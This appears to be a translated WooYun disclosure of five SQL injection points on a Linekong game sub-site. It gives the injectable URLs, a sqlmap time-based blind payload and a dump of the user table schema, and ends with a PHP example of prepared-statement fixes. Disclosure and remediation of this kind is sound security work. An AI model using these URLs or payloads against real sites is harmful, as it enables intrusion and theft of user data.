Vulnerability summary

Defect ID: wooyun-2015-0117094

Title: SQL injection at a Linekong sub-site, 5 spots submitted as one batch (user data involved)

Vendor: linekong.com

Author: hh2014

Submitted: 2015-05-30 10:22

Fixed: 2015-07-16 11:12

Disclosed: 2015-07-16 11:12

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-05-30: Details sent to the vendor, awaiting vendor handling
2015-06-01: Vendor confirmed; details visible to the vendor only
2015-06-11: Details disclosed to core white hats and domain experts
2015-06-21: Details disclosed to regular white hats
2015-07-01: Details disclosed to intern white hats
2015-07-16: Details disclosed to the public

Brief description:

A batch of SQL injections

Detailed description:

SQL injection points

Injection point 1:

http://xy.linkong.com/activity/love_code/_ajax.html.php?option=*&qid=1011&timeStame=1432905762461n62363&types=1

The option parameter is injectable.

Injection point 2:

http://xy.linkong.com/picture.php?page=2&sort_id=*

The sort_id parameter is injectable.

Injection point 3:

http://xy.linkong.com/xml/bcastr.php?num=5&sort_id=*

The sort_id parameter is injectable.

Injection point 4:

http://xy.linkong.com/xml/common.php?num=5&sort_id=*

The sort_id parameter is injectable.

Injection point 5:

http://xy.linkong.com/wallpaper.php?page=2&sort_id=*

The sort_id parameter is injectable.

sqlmap proof
Note the options used: level=5 --no-cast

sqlmap identified the following injection points with a total of 2367 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: http://xy.linekong.com:80/activity/love_code/_ajax.html.php?option='||(SELECT 'xEzN' FROM DUAL WHERE 8847=8847 AND SLEEP(5))||'&qid=1011&timeStame=1432905762461n62363&types=1
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
web application technology: Apache
back-end DBMS: MySQL 5.0.11
current user: 'xyweb@172.16.9.162'
current user is DBA: False
available databases [2]:
[*] information_schema
[*] xy_web
Database: xy_web
[234 tables]
Database: xy_web
Table: xy_member
[26 columns]
+----------------+--------------+
| Column | Type |
+----------------+--------------+
| address_id | int(11) |
| article_id | int(11) |
| group_id | int(11) |
| id | int(11) |
| image_id | int(11) |
| nickname | varchar(64) |
| uadd_time | datetime |
| url_id | int(11) |
| user_age | date |
| user_Dreply | int(11) |
| user_Dtopic | int(11) |
| user_email | varchar(32) |
| user_grading | varchar(64) |
| user_jointime | datetime |
| user_like | varchar(255) |
| user_movephone | varchar(32) |
| user_msn | varchar(128) |
| user_name | varchar(32) |
| user_passwd | varchar(32) |
| user_perfect | int(11) |
| user_qq | int(11) |
| user_sex | int(2) |
| user_state | int(2) |
| user_Treply | int(11) |
| user_Ttopic | int(11) |
| vote_id | int(11) |
+----------------+--------------+
Database: xy_web
Table: xy_member
[12 entries]


Proof of vulnerability:

(The same sqlmap output as in the detailed description above.)



Fix:

Parameter filtering

Copyright notice: please credit the source when republishing, hh2014@WooYun
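What "parameter filtering" should look like for endpoints of the shape reported above, as an added example that is not code from the linekong.com site: a hypothetical picture.php-style handler in the injectable form the report describes, beside a hardened version that validates types and uses prepared statements. The table and column names (xy_image, sort_id, id, title) and the allowed option values are assumptions.

```php
<?php
// Added example, not the site's code. The table/column names (xy_image, sort_id)
// and the allowed option values are assumptions; the request shape matches the
// report's picture.php?page=2&sort_id=* and _ajax.html.php?option=* endpoints.
declare(strict_types=1);

// BEFORE (the pattern behind "the sort_id parameter is injectable"): raw GET
// values are concatenated into the SQL text, so whatever follows sort_id= is
// executed as SQL, which is what the time-based blind payload relies on.
function listPicturesVulnerable(mysqli $db, array $get): mysqli_result|false
{
    $sortId = $get['sort_id'] ?? '';
    $offset = ((int) ($get['page'] ?? 1) - 1) * 20;
    $sql = "SELECT id, title FROM xy_image WHERE sort_id = $sortId "
         . "ORDER BY id DESC LIMIT $offset, 20";
    return $db->query($sql);
}

// AFTER, step 1: type validation. FILTER_VALIDATE_INT accepts only a plain
// in-range integer, so "1 AND SLEEP(5)", "0x1", "1e3" and arrays are rejected.
function positiveInt(array $get, string $name, int $default = 1, int $max = PHP_INT_MAX): int
{
    $v = filter_var($get[$name] ?? $default, FILTER_VALIDATE_INT,
                    ['options' => ['min_range' => 1, 'max_range' => $max]]);
    if ($v === false) {
        throw new InvalidArgumentException("invalid $name");
    }
    return $v;
}

// AFTER, step 2: a prepared statement, so the values never become SQL text.
function listPicturesHardened(mysqli $db, array $get): mysqli_result
{
    $sortId = positiveInt($get, 'sort_id');
    $offset = (positiveInt($get, 'page', 1, 10000) - 1) * 20;
    $stmt = $db->prepare(
        'SELECT id, title FROM xy_image WHERE sort_id = ? ORDER BY id DESC LIMIT ?, 20'
    );
    $stmt->bind_param('ii', $sortId, $offset);
    $stmt->execute();
    return $stmt->get_result();
}

// For a free-form string such as option=, an allowlist beats escaping: only
// values the code already knows about ever reach a query.
function optionValue(array $get): string
{
    $allowed = ['vote', 'list', 'query'];   // assumed; substitute the real set
    $opt = $get['option'] ?? '';
    if (!in_array($opt, $allowed, true)) {
        throw new InvalidArgumentException('invalid option');
    }
    return $opt;
}
```

In the page handler, catch InvalidArgumentException and answer with HTTP 400 so a rejected value never reaches the database; the page=, num= and qid= parameters get the same positiveInt() treatment.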


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 11

Confirmed: 2015-06-01 11:10

Vendor reply:

Thanks for pointing out the issue; the relevant staff have been assigned to handle it.

Latest status:

None yet